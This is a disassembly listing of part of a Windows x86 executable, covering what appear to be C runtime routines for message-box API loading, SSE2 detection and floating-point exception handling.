call sub_405127
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov ds:dword_426488, eax
call esi
push eax
call sub_405127
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_42648C, eax
call esi
push eax
call sub_405127
mov ds:dword_426490, eax
lea eax, [ebp+var_8]
push eax
call sub_407906
test eax, eax
pop ecx
pop ecx
jz short loc_40F5C7
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F5C7: ; CODE XREF: sub_40F524+94�j
cmp [ebp+var_8], 2
jnz short loc_40F5F9
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi
push eax
call sub_405127
cmp eax, ebx
pop ecx
mov ds:dword_426498, eax
jz short loc_40F5F9
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi
push eax
call sub_405127
pop ecx
mov ds:dword_426494, eax
loc_40F5F9: ; CODE XREF: sub_40F524+22�j
; sub_40F524+A7�j ...
mov eax, ds:dword_426494
mov esi, [ebp+var_10]
cmp eax, esi
jz short loc_40F672
cmp ds:dword_426498, esi
jz short loc_40F672
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
jz short loc_40F63F
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
push ds:dword_426498
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_40F63F
test [ebp+var_18], 1
jnz short loc_40F672
loc_40F63F: ; CODE XREF: sub_40F524+F4�j
; sub_40F524+113�j
lea eax, [ebp+var_C]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_40F65A
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40F65A: ; CODE XREF: sub_40F524+127�j
cmp [ebp+var_C], 4
jb short loc_40F669
or [ebp+arg_8], 200000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F669: ; CODE XREF: sub_40F524+13A�j
or [ebp+arg_8], 40000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F672: ; CODE XREF: sub_40F524+DF�j
; sub_40F524+E7�j ...
mov eax, ds:dword_42648C
cmp eax, esi
jz short loc_40F6A3
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40F6A3
mov eax, ds:dword_426490
cmp eax, esi
jz short loc_40F6A3
push [ebp+var_4]
push eax
call sub_405193
pop ecx
call eax
mov [ebp+var_4], eax
loc_40F6A3: ; CODE XREF: sub_40F524+143�j
; sub_40F524+14C�j ...
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
push ds:dword_426488
call sub_405193
pop ecx
call eax
loc_40F6BD: ; CODE XREF: sub_40F524+3B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F524 endp
; =============== S U B R O U T I N E =======================================
sub_40F6C2 proc near ; CODE XREF: sub_409AB4+27�p
; sub_409AB4+38�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jl short loc_40F6EB
cmp ecx, 2
jle short loc_40F6DE
cmp ecx, 3
jnz short loc_40F6EB
mov eax, ds:dword_425A9C
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6DE: ; CODE XREF: sub_40F6C2+E�j
mov eax, ds:dword_425A9C
mov ds:dword_425A9C, ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6EB: ; CODE XREF: sub_40F6C2+9�j
; sub_40F6C2+13�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
sub_40F6C2 endp
; =============== S U B R O U T I N E =======================================
sub_40F708 proc near ; CODE XREF: sub_40FD56+5F�p
; DATA XREF: sub_40A42B:loc_40A46D�o
xor eax, eax
retn
sub_40F708 endp
; =============== S U B R O U T I N E =======================================
sub_40F70B proc near ; CODE XREF: sub_40F76B�p
mov eax, offset sub_41134A
mov ds:off_423F80, eax
mov ds:off_423F84, offset sub_410A46
mov ds:off_423F88, offset sub_410A04
mov ds:off_423F8C, offset sub_410A38
mov ds:off_423F90, offset word_4109AE
mov ds:off_423F94, eax
mov ds:off_423F98, offset sub_4112C4
mov ds:off_423F9C, offset sub_4109C4
mov ds:off_423FA0, offset sub_41092E
mov ds:off_423FA4, offset sub_4108BD
retn
sub_40F70B endp
; =============== S U B R O U T I N E =======================================
sub_40F76B proc near ; CODE XREF: sub_407979+1C�p
; DATA XREF: .kSjx934:off_41ED94�o
arg_0 = dword ptr 4
call sub_40F70B
call sub_4113D0
cmp [esp+arg_0], 0
mov ds:dword_4264A0, eax
jz short loc_40F786
call sub_41136B
loc_40F786: ; CODE XREF: sub_40F76B+14�j
fnclex
retn
sub_40F76B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F789 proc near ; CODE XREF: sub_40F7D9+4D�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_4218E8
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_40F7C9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_40F7BE
cmp eax, 0C000001Dh
jz short loc_40F7BE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40F7BE: ; CODE XREF: sub_40F789+29�j
; sub_40F789+30�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and [ebp+var_1C], 0
loc_40F7C9: ; CODE XREF: sub_40F789+1B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40F789 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F7D9 proc near ; CODE XREF: sub_40A6DB+7�p sub_40F839�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
push ebx
mov [ebp+var_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_40F81C
push ecx
popf
xor eax, eax
cpuid
mov [ebp+var_C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, 1
cpuid
mov [ebp+var_4], edx
mov [ebp+var_8], eax
loc_40F81C: ; CODE XREF: sub_40F7D9+22�j
pop ebx
test [ebp+var_4], 4000000h
jz short loc_40F834
call sub_40F789
test eax, eax
jz short loc_40F834
xor eax, eax
inc eax
jmp short loc_40F836
; ---------------------------------------------------------------------------
loc_40F834: ; CODE XREF: sub_40F7D9+4B�j
; sub_40F7D9+54�j
xor eax, eax
loc_40F836: ; CODE XREF: sub_40F7D9+59�j
pop ebx
leave
retn
sub_40F7D9 endp
; =============== S U B R O U T I N E =======================================
sub_40F839 proc near ; DATA XREF: .kSjx934:0041D2D0�o
call sub_40F7D9
mov ds:dword_433C7C, eax
xor eax, eax
retn
sub_40F839 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F846 proc near ; CODE XREF: sub_40FE47+4A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov cl, byte ptr [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
mov [eax+4], edi
mov eax, [ebp+arg_0]
xor ebx, ebx
mov [eax+8], edi
mov eax, [ebp+arg_0]
inc ebx
test cl, 10h
mov [eax+0Ch], edi
jz short loc_40F878
mov eax, [ebp+arg_0]
or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_40F878: ; CODE XREF: sub_40F846+23�j
test cl, 2
jz short loc_40F88B
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_40F88B: ; CODE XREF: sub_40F846+35�j
test cl, bl
jz short loc_40F89D
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_40F89D: ; CODE XREF: sub_40F846+47�j
test cl, 4
jz short loc_40F8B0
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_40F8B0: ; CODE XREF: sub_40F846+5A�j
test cl, 8
jz short loc_40F8C3
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_40F8C3: ; CODE XREF: sub_40F846+6D�j
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
add ecx, ecx
not ecx
xor ecx, [eax+8]
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, 2
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_410046
test al, bl
jz short loc_40F932
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_40F932: ; CODE XREF: sub_40F846+E3�j
test al, 4
jz short loc_40F93D
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_40F93D: ; CODE XREF: sub_40F846+EE�j
test al, 8
jz short loc_40F948
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_40F948: ; CODE XREF: sub_40F846+F9�j
test al, 10h
jz short loc_40F953
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 2
loc_40F953: ; CODE XREF: sub_40F846+104�j
test al, 20h
jz short loc_40F95D
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_40F95D: ; CODE XREF: sub_40F846+10F�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_40F99D
cmp eax, 400h
jz short loc_40F991
cmp eax, 800h
jz short loc_40F982
cmp eax, ecx
jnz short loc_40F9A3
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F982: ; CODE XREF: sub_40F846+12E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, 2
loc_40F98D: ; CODE XREF: sub_40F846+155�j
mov [eax], ecx
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F991: ; CODE XREF: sub_40F846+127�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
jmp short loc_40F98D
; ---------------------------------------------------------------------------
loc_40F99D: ; CODE XREF: sub_40F846+120�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_40F9A3: ; CODE XREF: sub_40F846+132�j
; sub_40F846+13A�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_40F9CE
cmp eax, 200h
jz short loc_40F9C1
cmp eax, ecx
jnz short loc_40F9DB
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_40F9DB
; ---------------------------------------------------------------------------
loc_40F9C1: ; CODE XREF: sub_40F846+16D�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_40F9D9
; ---------------------------------------------------------------------------
loc_40F9CE: ; CODE XREF: sub_40F846+166�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_40F9D9: ; CODE XREF: sub_40F846+186�j
mov [eax], ecx
loc_40F9DB: ; CODE XREF: sub_40F846+171�j
; sub_40F846+179�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
cmp [ebp+arg_18], edi
mov eax, [ebp+arg_0]
mov edi, [ebp+arg_14]
jz short loc_40FA25
and dword ptr [eax+20h], 0FFFFFFE1h
mov eax, [ebp+arg_10]
fld dword ptr [eax]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
and dword ptr [eax+60h], 0FFFFFFE1h
fld dword ptr [edi]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+50h]
jmp short loc_40FA59
; ---------------------------------------------------------------------------
loc_40FA25: ; CODE XREF: sub_40F846+1B7�j
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
loc_40FA59: ; CODE XREF: sub_40F846+1DD�j
call sub_410051
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_41D1AC
mov ecx, [ebp+arg_0]
test byte ptr [ecx+8], 10h
jz short loc_40FA7A
and dword ptr [esi], 0FFFFFFFEh
loc_40FA7A: ; CODE XREF: sub_40F846+22F�j
test byte ptr [ecx+8], 8
jz short loc_40FA83
and dword ptr [esi], 0FFFFFFFBh
loc_40FA83: ; CODE XREF: sub_40F846+238�j
test byte ptr [ecx+8], 4
jz short loc_40FA8C
and dword ptr [esi], 0FFFFFFF7h
loc_40FA8C: ; CODE XREF: sub_40F846+241�j
test byte ptr [ecx+8], 2
jz short loc_40FA95
and dword ptr [esi], 0FFFFFFEFh
loc_40FA95: ; CODE XREF: sub_40F846+24A�j
test [ecx+8], bl
jz short loc_40FA9D
and dword ptr [esi], 0FFFFFFDFh
loc_40FA9D: ; CODE XREF: sub_40F846+252�j
mov eax, [ecx]
and eax, 3
xor ebx, ebx
sub eax, ebx
mov edx, 0FFFFF3FFh
jz short loc_40FADC
dec eax
jz short loc_40FACE
dec eax
jz short loc_40FABE
dec eax
jnz short loc_40FADE
or dword ptr [esi], 0C00h
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FABE: ; CODE XREF: sub_40F846+26B�j
mov eax, [esi]
and eax, 0FFFFFBFFh
or eax, 800h
loc_40FACA: ; CODE XREF: sub_40F846+294�j
mov [esi], eax
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FACE: ; CODE XREF: sub_40F846+268�j
mov eax, [esi]
and eax, 0FFFFF7FFh
or eax, 400h
jmp short loc_40FACA
; ---------------------------------------------------------------------------
loc_40FADC: ; CODE XREF: sub_40F846+265�j
and [esi], edx
loc_40FADE: ; CODE XREF: sub_40F846+26E�j
; sub_40F846+276�j ...
mov eax, [ecx]
shr eax, 2
and eax, 7
sub eax, ebx
jz short loc_40FAFF
dec eax
jz short loc_40FAF4
dec eax
jnz short loc_40FB0A
and [esi], edx
jmp short loc_40FB0A
; ---------------------------------------------------------------------------
loc_40FAF4: ; CODE XREF: sub_40F846+2A5�j
mov eax, [esi]
and eax, edx
or eax, 200h
jmp short loc_40FB08
; ---------------------------------------------------------------------------
loc_40FAFF: ; CODE XREF: sub_40F846+2A2�j
mov eax, [esi]
and eax, edx
or eax, 300h
loc_40FB08: ; CODE XREF: sub_40F846+2B7�j
mov [esi], eax
loc_40FB0A: ; CODE XREF: sub_40F846+2A8�j
; sub_40F846+2AC�j
cmp [ebp+arg_18], ebx
jz short loc_40FB16
fld dword ptr [ecx+50h]
fstp dword ptr [edi]
jmp short loc_40FB1B
; ---------------------------------------------------------------------------
loc_40FB16: ; CODE XREF: sub_40F846+2C7�j
fld qword ptr [ecx+50h]
fstp qword ptr [edi]
loc_40FB1B: ; CODE XREF: sub_40F846+2CE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40F846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB20 proc near ; CODE XREF: sub_40FE47+21�p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_40FB4E
test byte ptr [ebp+arg_8], bl
jz short loc_40FB4E
push ebx
call sub_410084
pop ecx
and esi, 0FFFFFFF7h
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB4E: ; CODE XREF: sub_40FB20+18�j
; sub_40FB20+1D�j
test al, 4
jz short loc_40FB68
test byte ptr [ebp+arg_8], 4
jz short loc_40FB68
push 4
call sub_410084
pop ecx
and esi, 0FFFFFFFBh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB68: ; CODE XREF: sub_40FB20+30�j
; sub_40FB20+36�j
test al, bl
jz loc_40FC0A
test byte ptr [ebp+arg_8], 8
jz loc_40FC0A
push 8
call sub_410084
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz short loc_40FBE2
cmp eax, 400h
jz short loc_40FBCC
cmp eax, 800h
jz short loc_40FBB6
cmp eax, ecx
jnz short loc_40FC02
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
fld ds:dbl_4240C8
test ah, 5
jnp short loc_40FC00
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBB6: ; CODE XREF: sub_40FB20+7A�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jnp short loc_40FBF0
fld ds:dbl_4240C8
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBCC: ; CODE XREF: sub_40FB20+73�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
fld ds:dbl_4240C8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBE2: ; CODE XREF: sub_40FB20+6C�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
loc_40FBF0: ; CODE XREF: sub_40FB20+A2�j
fld ds:dbl_4240B8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBF8: ; CODE XREF: sub_40FB20+B8�j
; sub_40FB20+CE�j
fld ds:dbl_4240B8
loc_40FBFE: ; CODE XREF: sub_40FB20+94�j
; sub_40FB20+AA�j
fchs
loc_40FC00: ; CODE XREF: sub_40FB20+92�j
; sub_40FB20+C0�j ...
fstp qword ptr [ecx]
loc_40FC02: ; CODE XREF: sub_40FB20+7E�j
and esi, 0FFFFFFFEh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FC0A: ; CODE XREF: sub_40FB20+4A�j
; sub_40FB20+54�j
test al, 2
jz loc_40FCDF
test byte ptr [ebp+arg_8], 10h
jz loc_40FCDF
xor esi, esi
test al, 10h
jz short loc_40FC24
mov esi, ebx
loc_40FC24: ; CODE XREF: sub_40FB20+100�j
fldz
push edi
mov edi, [ebp+arg_4]
fcomp qword ptr [edi]
fnstsw ax
test ah, 44h
jnp loc_40FCC9
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_40FF97
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_40FC6B
fld [ebp+var_10]
mov esi, ebx
fmul ds:dbl_41EE18
jmp short loc_40FCBF
; ---------------------------------------------------------------------------
loc_40FC6B: ; CODE XREF: sub_40FB20+13C�j
fldz
fcomp [ebp+var_10]
fnstsw ax
test ah, 41h
jnz short loc_40FC7B
mov edx, ebx
jmp short loc_40FC7D
; ---------------------------------------------------------------------------
loc_40FC7B: ; CODE XREF: sub_40FB20+155�j
xor edx, edx
loc_40FC7D: ; CODE XREF: sub_40FB20+159�j
movzx eax, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_40FCB6
sub eax, ecx
loc_40FC96: ; CODE XREF: sub_40FB20+194�j
test byte ptr [ebp+var_10], bl
jz short loc_40FCA1
test esi, esi
jnz short loc_40FCA1
mov esi, ebx
loc_40FCA1: ; CODE XREF: sub_40FB20+179�j
; sub_40FB20+17D�j
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_40FCB0
or dword ptr [ebp+var_10], 80000000h
loc_40FCB0: ; CODE XREF: sub_40FB20+187�j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_40FC96
loc_40FCB6: ; CODE XREF: sub_40FB20+172�j
test edx, edx
jz short loc_40FCC2
fld [ebp+var_10]
fchs
loc_40FCBF: ; CODE XREF: sub_40FB20+149�j
fstp [ebp+var_10]
loc_40FCC2: ; CODE XREF: sub_40FB20+198�j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_40FCCB
; ---------------------------------------------------------------------------
loc_40FCC9: ; CODE XREF: sub_40FB20+111�j
mov esi, ebx
loc_40FCCB: ; CODE XREF: sub_40FB20+1A7�j
test esi, esi
pop edi
jz short loc_40FCD8
push 10h
call sub_410084
pop ecx
loc_40FCD8: ; CODE XREF: sub_40FB20+1AE�j
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_40FCDF: ; CODE XREF: sub_40FB20+29�j
; sub_40FB20+43�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_40FCF6
test byte ptr [ebp+arg_8], 20h
jz short loc_40FCF6
push 20h
call sub_410084
pop ecx
and esi, 0FFFFFFEFh
loc_40FCF6: ; CODE XREF: sub_40FB20+1C3�j
; sub_40FB20+1C9�j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_40FB20 endp
; =============== S U B R O U T I N E =======================================
sub_40FD01 proc near ; CODE XREF: sub_40FD56+6C�p
; sub_40FD56+91�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_40FD1D
jle short locret_40FD28
cmp eax, 3
jg short locret_40FD28
call sub_4057D3
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_40FD1D: ; CODE XREF: sub_40FD01+7�j
call sub_4057D3
mov dword ptr [eax], 21h
locret_40FD28: ; CODE XREF: sub_40FD01+9�j
; sub_40FD01+E�j
retn
sub_40FD01 endp
; =============== S U B R O U T I N E =======================================
sub_40FD29 proc near ; CODE XREF: sub_40FE47+55�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_40FD35
push 5
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD35: ; CODE XREF: sub_40FD29+6�j
test al, 8
jz short loc_40FD3D
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40FD3D: ; CODE XREF: sub_40FD29+E�j
test al, 4
jz short loc_40FD45
push 2
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD45: ; CODE XREF: sub_40FD29+16�j
test al, 1
jz short loc_40FD4D
push 3
loc_40FD4B: ; CODE XREF: sub_40FD29+A�j
; sub_40FD29+1A�j
pop eax
retn
; ---------------------------------------------------------------------------
loc_40FD4D: ; CODE XREF: sub_40FD29+1E�j
movzx eax, al
and eax, 2
add eax, eax
retn
sub_40FD29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FD56(int,int,int,int,int,int,double,int)
sub_40FD56 proc near ; CODE XREF: sub_40FDF4+2A�p
; sub_40FE47+87�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_40FD5E: ; CODE XREF: sub_40FD56+18�j
mov ecx, ds:dword_423FD0[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_40FDCE
inc eax
cmp eax, 1Dh
jl short loc_40FD5E
xor eax, eax
loc_40FD72: ; CODE XREF: sub_40FD56+7F�j
test eax, eax
mov [ebp+var_1C], eax
jz short loc_40FDD7
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_41005D
lea eax, [ebp+var_20]
push eax
call sub_40F708
add esp, 0Ch
test eax, eax
jnz short loc_40FDC8
push esi
call sub_40FD01
pop ecx
loc_40FDC8: ; CODE XREF: sub_40FD56+69�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40FDCE: ; CODE XREF: sub_40FD56+12�j
mov eax, ds:off_423FD4[eax*8]
jmp short loc_40FD72
; ---------------------------------------------------------------------------
loc_40FDD7: ; CODE XREF: sub_40FD56+21�j
push 0FFFFh
push [ebp+arg_20]
call sub_41005D
push [ebp+arg_0]
call sub_40FD01
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_40FD56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FDF4(int,double,int)
sub_40FDF4 proc near ; CODE XREF: sub_40A6EF+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_423FC0, 0
jnz short loc_40FE28
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_40FD56
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FE28: ; CODE XREF: sub_40FDF4+A�j
call sub_4057D3
push 0FFFFh
push [ebp+arg_C]
mov dword ptr [eax], 21h
call sub_41005D
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_40FDF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FE47(int,int,double,double,int)
sub_40FE47 proc near ; CODE XREF: sub_40A6EF:loc_40A7B4�p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+80h+var_4], eax
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_40FB20
add esp, 0Ch
test eax, eax
jnz short loc_40FE99
and [esp+80h+var_40], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+98h+var_80]
push eax
call sub_40F846
add esp, 1Ch
loc_40FE99: ; CODE XREF: sub_40FE47+2B�j
push [ebp+arg_0]
call sub_40FD29
add esp, 4
cmp ds:dword_423FC0, 0
jnz short loc_40FED8
test eax, eax
jz short loc_40FED8
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_40FD56
add esp, 24h
jmp short loc_40FEF2
; ---------------------------------------------------------------------------
